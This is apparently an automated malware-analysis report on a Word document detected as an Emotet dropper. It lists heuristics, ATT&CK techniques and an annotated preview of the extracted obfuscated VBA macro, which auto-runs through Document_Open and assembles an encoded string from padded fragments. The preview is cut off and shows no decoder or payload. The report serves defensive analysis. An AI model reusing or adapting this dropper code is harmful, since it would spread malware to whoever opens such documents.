MALICIOUS
162
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample was detected by ClamAV as 'Doc.Dropper.Emotet-6769465-0', indicating a known Emotet dropper. The presence of a 'Document_Open' VBA macro strongly suggests that the macro is designed to execute automatically when the document is opened, likely to download and execute a secondary payload. The VBA code itself is heavily obfuscated, but the overall structure and the ClamAV signature point to a malicious dropper.
Heuristics 5
-
ClamAV: Doc.Dropper.Emotet-6769465-0 — critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Dropper.Emotet-6769465-0
-
OLE document has large unaccounted-for region — high — OLE_SLACK_ANOMALY: OLE file is 84,750 bytes but its declared streams total only 36,254 bytes — 48,496 bytes (57%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
VBA macros detected — medium — 1 related finding — OLE_VBA_MACROS: Document contains VBA macro code
-
Document_Open macro — high — OLE_VBA_DOCOPEN: Document_Open macro
-
Embedded URL — info — EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main — in document text (OLE body). (This is the standard Office Open XML DrawingML namespace identifier and appears in ordinary documents.)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8618 bytes |
| SHA-256: bd1a64e56f3e9fea93a67041977bf1044bbe7c4d4567519cf6a02853083edd58 | | | |
Preview script — first 1,000 lines of the extracted script
Attribute VB_Name = "jVYtUPcqB"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Auto-run entry point: Word invokes Document_Open when the document is
' opened, so the body below runs with no further user interaction once
' macros are enabled. This is the behaviour the OLE_VBA_DOCOPEN heuristic
' flags and the reason the ClamAV dropper signature matters.
Private Sub Document_Open()
' Every If ... End If pair in this procedure has an empty body: nothing
' executes between the two keywords, so the comparison result is never
' used. The compared names are not declared anywhere in the preview.
' These blocks only pad the module and disturb simple pattern matching;
' they can be skipped when reading the logic.
If iNHpEw >= dsZGTv Then
End If
If SpOYK Eqv 15 Then
End If
If ZMchXh And 12 Then
End If
If IzEXM Xor 16 Then
End If
If mEciUV < 15 Then
End If
If MzzOW = XFAJr Then
End If
' The single statement that does real work: twelve helper functions are
' called, their results joined with "+", and the joined value handed to
' mmjATOqHNPqPj. Four of the helpers (ttjtpuWFM, tljhitiiGLo, nrcnHF,
' njEqOSbS) are visible further down and each returns an obfuscated string
' fragment. mmjATOqHNPqPj and the other helpers are not in this preview,
' so the decoding step and whatever is ultimately executed cannot be read
' from what is shown — presumably the joined string is the encoded payload
' or command; confirm against the full extracted module.
mmjATOqHNPqPj (ttjtpuWFM + tljhitiiGLo + nrcnHF + njEqOSbS + FDMRWCinY + OkhQzwYF + XqjwQ + GDYrDJMSc + djiiR + YKFtH + IjOCi + EkWMOB)
If AjGnC <= SlUWj Then
End If
If YKIwA <> DQjLs Then
End If
End Sub
Attribute VB_Name = "AQniZNf"
' Helper that returns one fragment of the obfuscated string assembled in
' Document_Open. Four locals are each built from short literal pieces
' concatenated with "+", then joined in order. No decoding happens here;
' the "[" characters that recur through the literals are presumably filler
' stripped by a decoder outside this preview — confirm against the full
' module. The empty If ... End If pairs do nothing (see Document_Open).
Function ttjtpuWFM()
dBVArF = "`ja ,S,@ [p[" + "b[q [0[E[T:[J[v[n[" + " [ZS[*[ [P[l," + "[ [bC[l[ [)" + "[g[c[ [U[V[G[ "
If koCVu <> YhwvuO Then
End If
If FXPhRn <= iCCRG Then
End If
If XXpVu = WXkji Then
End If
If GJrBn And PdDpXW Then
End If
BnHINsMinXf = "[1[J,[ [gQ[;[ ,T" + "[>[ [2[0[A[ " + "[_[J[z[ [F[nq[ [+" + "D[I[ [r[b[ [ ]F [" + " [pn+[ [g&[W[" + " [>[w[M[zs[yK"
If bvHzSR <> 16 Then
End If
nLIsfDrfBKz = "[z[A[J[6[x[_[i[t" + "[e[XO[0`F[4[5[q[" + "qr[j[^[yd[n`&[!o[" + "z[g[/[G88[t2[h[^[#"
dqSciv = "[3[^K[J[\[bu[2[" + "Io[9[L/[_[;[h" + "[q8[{['%[T$[H["
' Return value: the four fragments in declaration order.
ttjtpuWFM = dBVArF + BnHINsMinXf + nLIsfDrfBKz + dqSciv
If NYzFmA > olzbm Then
End If
End Function
' Second string-fragment helper called from Document_Open. Three locals are
' assembled from split literal pieces and returned joined; the empty
' If ... End If pairs are inert padding. Note the """" piece in wFDsV, which
' is VBA for a single double-quote character, so the fragment embeds a
' literal quote — consistent with the joined string being a quoted command
' or argument once decoded (decoder not visible here; confirm).
Function tljhitiiGLo()
jMSzGVmwIN = "N[^[{[L[zm&[" + "d[*[![8[X[M[ [([" + "z[E[j[0o[L"
If FcbTaK Xor XuDaGJ Then
End If
wFDsV = "[b`[4[b[q[>[ [q[F" + "[h[T[r[*[2[w&[b[" + "X[b[f[h[_[P[;l[4" + "otsx[ [gk[=%[2[F[.[" + "U%[8M[/@&[3[*" + "[l[T[ " + """" + "[l[^["
cKAKJAuw = "v[X[6[m[W[{[8[![Q[>" + ",[ F[7[$[)[A" + "[Z[1[N[t[x[y[f[.[4[G"
' Return value: the three fragments in declaration order.
tljhitiiGLo = jMSzGVmwIN + wFDsV + cKAKJAuw
If rDlil Or 13 Then
End If
If FosoP <= 10 Then
End If
End Function
' Third string-fragment helper called from Document_Open. Same pattern as
' the others: three locals built from split literals, joined and returned;
' the If ... End If pairs have no body and do nothing. Nothing in this
' function executes anything or touches the filesystem or network.
Function nrcnHF()
GpXUmshi = "[I[+['[z[!<O[w%[1[^[" + "5[bn[u[^[iO[T[-" + "[f[a[N[i[C" + "[E[<[ [a[#K" + "[m[^e[n[B[l[-[v"
If ufIsVw = EKNSk Then
End If
If XChsqp >= uoSAEC Then
End If
qHoQGBSmzVr = "B[i%[ [Ik7[N[M[" + "t,[-[n[l[Z%&[A[([/[" + "c[+[-[([a[h[ [9"
AYMoAtMj = "&[Q[6[/&[p" + "[q[\[F[![P[1[w[x[" + "?['[b[v[z[U[Vo[y@" + "[B[qx[h[X[x[I[2[b&G" + "[y[Y[_[e[H[P" + "[>s[C[9[l["
' Return value: the three fragments in declaration order.
nrcnHF = GpXUmshi + qHoQGBSmzVr + AYMoAtMj
If mHjKq = 10 Then
End If
If JHBPCE > PmSZuD Then
End If
End Function
' Fourth string-fragment helper called from Document_Open. Six locals are
' built from split literal pieces and returned joined; the many empty
' If ... End If pairs are inert padding interleaved with the assignments.
' The last fragment ends with """", i.e. a literal double-quote, so the
' decoded output presumably closes a quoted argument here — confirm once the
' decoder (not in this preview) is known.
Function njEqOSbS()
If nIoRP <= 18 Then
End If
If vDIjva = 11 Then
End If
If XqMzW Eqv XEQFNI Then
End If
knXADqtsBPr = ">[0[f[![e%[M" + " [R[E[8k[3%[C[f[5" + "[^[P[ 8[B[v[N" + "[ [p[:[f[3[=[>" + "[I[h[b[g[!.[([ %[]k" + "S[eo[X[m`[T[#A[^[C["
TUtAPjKdBj = ")K[b[6[.[to[![Z[(" + "[l[#^4[c[]S[" + "![8[B[p[{$[W[i[F[b[" + "I[8[n[u[p[F[#[b"
If opNVj And XVYnH Then
End If
If mDOaFN <> 17 Then
End If
If wYhjd Or qGGkO Then
End If
If GpbJZ Xor RhLfG Then
End If
UVCwI = "[5[=[x[+[E" + "[u[p[$[9[Co[([c[" + "<N[t[c[{[)["
kpnwCSo = "h[D[Q[F[w[.[b[X[![" + "eS[7[([N[w[v[" + "$k[q[=[Y['" + "*[z[$,[B[L[([" + "([w[D`s[{[Q[f"
If ZkamBm And sffBOz Then
End If
If mLJGF Or NHAloX Then
End If
If SVaqp <= 16 Then
End If
If AOXSbj <= 3 Then
End If
ivbzHYtafmG = "[ [;[A[i[0[j[v[" + "_[5[Fk[rKSk[m[2[J" + "[q[7[M[T[ s[ [" + "?[)k[;[a[Cb[P[M[w[" + "!![7[ [:[)[d`T["
smZWwSjrSXi = ":O[?[^[X[L[.m[e" + "[+[8[![(][r[" + "8[$[][i$[IO[" + "X[3s[d[(6[N[d[h[" + "1&[?[j[$[p[/[ [ [T" + """"
' Return value: the six fragments in declaration order.
njEqOSbS = knXADqtsBPr + TUtAPjKdBj + UVCwI + kpnwCSo + ivbzHYtafmG + smZWwSjrSXi
If hjbvM > ZBNOBz Then
End If
If ivVBv Or oliawj Then
End If
If Xcfpj > FwpjR Then
End If
End Function
Function FDMRWCinY()
If ipBja Xor 1 Then
End If
If zqTJlh <= rjUbbW Then
End If
iDhCqI = "[+:[z[F[E[ {[N" + "[I[tP6[vh[I[][+w" + "[q[l,[![.,[q[8[1[n[" + "u&[x[a[4[$[" + "z[7[<[=[V[*[e["
EPsRdEJmcE = "$[b[W[T%[ [Lo[q" + "[B[_[4[f[X@[-[" + "i[0[+k[m[Q[" + "7[A[P[Q[Y[W[+k[u[5[$
... (truncated)
|
|||